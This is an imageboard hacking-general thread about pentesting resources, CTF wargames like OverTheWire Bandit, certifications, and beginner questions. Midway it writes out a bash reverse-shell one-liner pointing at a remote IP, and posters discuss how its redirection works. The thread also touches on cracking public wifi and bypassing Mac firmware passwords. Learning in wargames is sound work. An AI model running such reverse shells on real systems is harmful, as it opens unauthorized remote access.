/hmg/ Hackerman General

In /hmg/ we discuss pentesting, ctfs, exploits, and general being a hackerman.

Resources:

VM/CTFs:
overthewire.org/wargames/bandit/
>easy beginner bullshit

vulnhub.com/
>prebroken images to work on.

hackthebox.eu/
>super secret club

Tools:
kali.org/
>meme dragon distro but it just werks

metasploit.com/
>scriptkiddie starting point and swiss army knife

Tutorials/Guides:
abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob
>From zero to OSCP-hero rough outline

youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
>IppSec, video guides for retired HTB VMs.

Certs:
eccouncil.org/programs/certified-ethical-hacker-ceh/
>CEH, only looks good a resume to non-technical in HR

offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/
>OSCP, the big dick swinging exam, 24 hours to own 5 machines and a further 24 hours to write up a report detailing your methods.

Other urls found in this thread:

youtube.com/watch?v=J1q4Ir2J8P8
eccouncil.org/programs/certified-ethical-hacker-ceh/
github.com/CaseAnon/Dump/blob/master/Links.txt
github.com/enaqx/awesome-pentest
overthewire.org/wargames/bandit/
youtube.com/watch?v=vg9cNFPQFqM&t=3217s
twitter.com/AnonBabble

hax my anus

i like this guy

i dare anyone to hack me right now

I got three mac mini's donated from work. They have firmware passwords, have yall used thunderstrike to wipe the fireware password?

bump 'cause pentest is fun

I plan to study it further, but is it any profit in freelancing it?

The issue with Freelancers as far as I'm finding is good legal representation when defining scope/attack surface.

All the Freelancers I know who make dosh have a friend/spouse with related legal experience help them with the legal ass covering.

Doesn't even have ctftime in the op. What sort of script kiddie shit is this.

Cracker*

Does Atheros support aircrack ? I want to test the security of public wifi.

so /sec/ but with more underage? sign me the fuck up

98% of events this year are "hacker jeopardy" only one AD.

/sec/ with actually doing shit instead of autistic screeching between shills.

Sup Forums certified hackerman

install gentoo

sadly underrated post

how do i get started?
already isntalled gentoo, btw

youtube.com/watch?v=J1q4Ir2J8P8

>Certs:
>eccouncil.org/programs/certified-ethical-hacker-ceh/
>>CEH, only looks good a resume to non-technical in HR
Ok, Hackerman. how do I obtain one of these without paying money?

looks like it's too late for his hair

They're over $800. Fuck that. I'll make my own certificate for free.

nobody cares about retarded semantics

The fact that some

with blackjack

done.

Bash reverse shell.

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

So it makes an popout shell, cool. It redirects standard out from the shell to my address and port, cool.

What in the name of fuck is 0>&1 doing? And why does it work when I put the 0> OR as 0<

It doesn't make sense. How the fuck can it still perform the same it it's being redirected elsewhere?

I don't get it either, I normally run a python reverse shell so that I can import pty and spawn a tty shell if I need one.

github.com/CaseAnon/Dump/blob/master/Links.txt
enjoy

This is a good general and I fully support this. I will live in this general, I will bump this general. Fuck those cyberpunk guys, fuck those privacy guys, this is the thread.

>What in the name of fuck is 0>&1 doing?
Well if I don't include it, the nc connection opens, then automatically closes. So it's important, but why?

Changing the 0 to any other number causes it to fail. Changing the 1 to 2 cusses it to still work. Any higher than 2 and it fails. What the fuck does that part of the code do?

Been recently messing around with Kali on my home network
i like all of the air*-ng tools a lot and nmap is pretty daunting and i hope to learn more about it

github.com/enaqx/awesome-pentest

IO streams are unix magic, anons.
The file descriptors for stdin, stdout, and stderr are 0, 1, and 2, respectively.

Hahahaha fuck me. Good, good. Thanks for that dude

Also for the record I think most bash packages are compiled without /dev/tcp though it is a cool fucking feature in theory practically no admin should allow this.

Sup Sup Forums.Which are in your opinion the very basics somebody should know by heart before trying to do anything practical?Python?Networking?Shell (idk what it is desu)?I don't want to fuck up by doing some really stupid and useless shit with Kali Linux or other popular stuff.

>practically no admin should allow this.
I don't doubt it's not in the real world. It was just for the wargame, and think it's neat how it's basically a one liner

in my opinion sign up for open challenges/wargame shit, learn what you need as you go. Better if it's milestoney and not timed stuff, for education. A lot of places release the test system VMs after the challenge is over for you to poke on too.

Practically though you can "luck" or curiousity into incredibly vulnerable stuff without any education.

>overthewire.org/wargames/bandit/
>easy beginner bullshit

Wasted 2 weeks trying to solve several levels. Brainlet.

I partly agree with this message, privacy is part of security. Aside from that, I am one of the old cyberpunk and cybersecurity OPs and I slowly learnt to detest them, which is why I stopped posting it.

Overthewire.org/bandit will give you basic understanding how computers work and where some information can be found.

You are aware there are solutions? And if you use them, and actually learn, it's a good thing?

A hacker is someone who enjoys playful cleverness—not necessarily with computers. The programmers in the old MIT free software community of the 60s and 70s referred to themselves as hackers. Around 1980, journalists who discovered the hacker community mistakenly took the term to mean “security breaker.”

Please don't spread this mistake. People who break security are “crackers.”

>In /hmg/ we discuss pentesting, ctfs, exploits
Get the fuck out of here you pretentious, cancerous cunt

>is x a botnet
>is x a meme
>how can I retain every convenience modern life offers me while at the same time getting off the grid
Seeing that shit make up all the threads was beyond frustrating. All I wanted was experienced pen testers to talk to, and when the cyb people started on maderas for fuck knows whatever reason, him and the three other people who know something about cyber security all left.

Don't get me wrong, I love the cyb aesthetic. But the bare bones beginners all wanting to jump in, and complaining the pasta was too difficult did my head in.

But what is the challenge if you don't solve a problem by yourself?

This is exactly why I fled. I wanted the general to be more about cybersecurity and technological applications in a cyberpunk world, rather than nothing but artwork, music and memes.
I guess we can all dream.
Anyway, that's why I'm glad the /sec/ community demerged again, hopefully we can keep this one alive.

are you a trap though?

i have a netgear n150 usb adaptor that works like a charm and cost me about 29.00.

That's not pretentious, it's actually true. You little wannabe "hacker"

Please leave your neighbor's WiFi alone.

Are you sure? So far I'm on 5, and it's pretty fucking lame desu. I'm basically just navigating around the terminal. Does this get better/more challenging?

...

>desu
I forget what I said. I've been up for 28 hours. Did I actually type desu this time? Wtf. I'm tripping.

Learning something trumps that.

That does actually sound like a great combination.

Yeah, I'm on 20 and it's making me have to read manpages and actually stumping me

Why do you choose to enter threads you don't like?

Because they're Sup Forumsictims who don't like it when Sup Forums stops talking about GPUs and overclocking for 5 minutes.

...

>it's making me have to read manpages
What would you rate your skill level with the terminal before you started? From 1-10.

Reading manpages doesn't seem challenging. Does it ever make you look for log files/destroy them, etc? Fun shit, m8.

I love this thread. I'm just saying, he wasn't wrong, and there was no reason to call him a "pretentious, cancerous cunt". When you say "hacker" to older people, i.e. people that actually know their shit, that's what they take the word to mean. Newfags and script kiddies take it to mean something entirely out of scope, i.e. "badass computer guy breaking into NASA" kek

I have completed through 26; no there is no log manipulation and no persistence at least up to where I stopped

So, what're we meant to do? Call hackers, crackers? Call original hackers, MIT hackers, or?

wtffff.....
help me desu!

>t. underage script kiddie

hacker is a philosophy and a way of living your life. You can be a hacker without using a computer.

In fact, the first hackers were the students of the Tech Model Railroad Club of MIT. A Cracker is someone who uses his vast knowledge in computer to do malicious things, or to test and patch security holes (pentester).

Your 5 worded post is enough to safely assume you have no will to learn and discover things, expanding your knowledge. You just wanna be a lamer and get some facebook nudes. Go back to school and grow up.

We are not supposed to do anything different. He knows exactly what we meant when we said hackers, and is being obtuse. The whole world knows what a hacker is, and this is the correct term.

Turn it off and on.

Call them what they are: pentesters. "Hacker" sounds so fucking retarded, fake, and gay.

how new are you desu

Not new at all. I know certain words get swapped, like f a m, but I don't know if I typed desu or f a m , or whatever that time. You lack reading comprehension, I see. You'll never make it as a pentester.

OK, I get it , you are very new.
desu is t b h. Thank me later.
>You lack reading comprehension, I see.
I don't. user please.
>You'll never make it as a pentester.
Please don't project your insecurities onto me. I'm sure you'll make a fine pentester. It's not like being new in Sup Forums is bad in itself. Relax.

I have a shitty $10 bluetooth/aux speaker.
It is some no-brand chinese import sold in some local store.

The chances of removing the bluetooth support seem pretty high to me, as far as I understand I just need to desolder whatever bluetooth module there is.
Are the chances of making it into a pure speaker without the annoying SOC in the background? As it charges through USB, there at least has to be some system to control that.

Where do small bluetooth/IoT devices usually store their audio chimes? Anything that often works for disabling that too?

the whole word is full of wannabe kiddies like you who misinterpret meaning and philosophy of a hacker. This whole thread is a pathetic attempt to get something done without acquiring knowledge and should be burned to the ground.
/sec/ gives all the resources you need to improve yourself and do the things you wanna do. It takes time, sacrifice, practice. That's what a hacker does. That's what u'll never be.

So does f a m senpai, try it, tard.
>I don't. user please.
Clearly you do, my post was straightforward as fuck. Obviously I knew what happened, "did I actually type desu this time?" fucking retard.
>Please don't project your insecurities onto me. I'm sure you'll make a fine pentester. It's not like being new in Sup Forums is bad in itself. Relax.
Nice words, you've diffused my sperg attack. Thanks, user. You too.

world*

What I meant is that you typed desu in this sentence and I know you know it.
>Clearly you do, my post was straightforward as fuck.
I don't. user, please.
>Nice words, you've diffused my sperg attack. >Thanks, user. You too.
You're welcome.

>What I meant is that you typed desu in this sentence
Clearly we are both smashed as fuck. Good night user.

Oh. No, I really don't. I type too fast, and like I've said, I've been up too long. My typing hands are too quick for my brain to process what's going on, at least it was then.

Explanation:
System 2 was typing, while system 1 was focused on another task.

one last thing fampai : f a m is senpai.

Yeah, just realized that senpai. Hard to keep up with them.
topkek, good night bro

The whole world also knows that the Mac is something you can install on a PC, that Linus sucks at developing filepickers and that piracy is theft.

bump motherfuckers. what do?

> piracy
Copyright infringement*

turn it off and on

didn't work. any other idea?

I mean your computer

yeah, didnt work. any idea?

youtube.com/watch?v=vg9cNFPQFqM&t=3217s
ive been watching this tutorial and i'm about 13 hours in. it's pretty good, i've learned a lot. instead of running Kali in a vm though, i just made a live usb instead and have been running it off of my thinkpad.
some of the tools are pretty intricate, like Wireshark and Nmap. Once I finish the video though, I think i'm just gonna try to learn the ins and outs of Nmap and Wireshark

there's probly 2 components in this device, the soc and the actual speaker. you can just plug into speaker wires and pretend the rest doesn't exist if you want?

Edit the file ~/.ssh/known_hosts, and remove the enty with something like: 'bandit.labs.overthewire.org'. After that, connect to the server again and it will prompt you to "trust" that host again, just like the first time you connected to bandit.labs.overthewire.org

I'm afraid you reached the limits of my wisdom

is it me or are there multiple unique lines in level 8

Is this what /cyber/ turned into?

/cyber/ is /sec/

That's what i thought too. uniq -u data.txt is supposed to return lines that only appear once, but i got multiple lines returned as well.

what about charging? Or does that usually go straight to the battery without needing much control?

did some smartass change the file

Ah. don't see a general up right now.

Alternatively, you can copy the command, "ssh-keygen -f "/home... thewire.org]:2220", from the error output and try that. Also, did you actually read the error or did you just take a screenshot as soon as you got the error?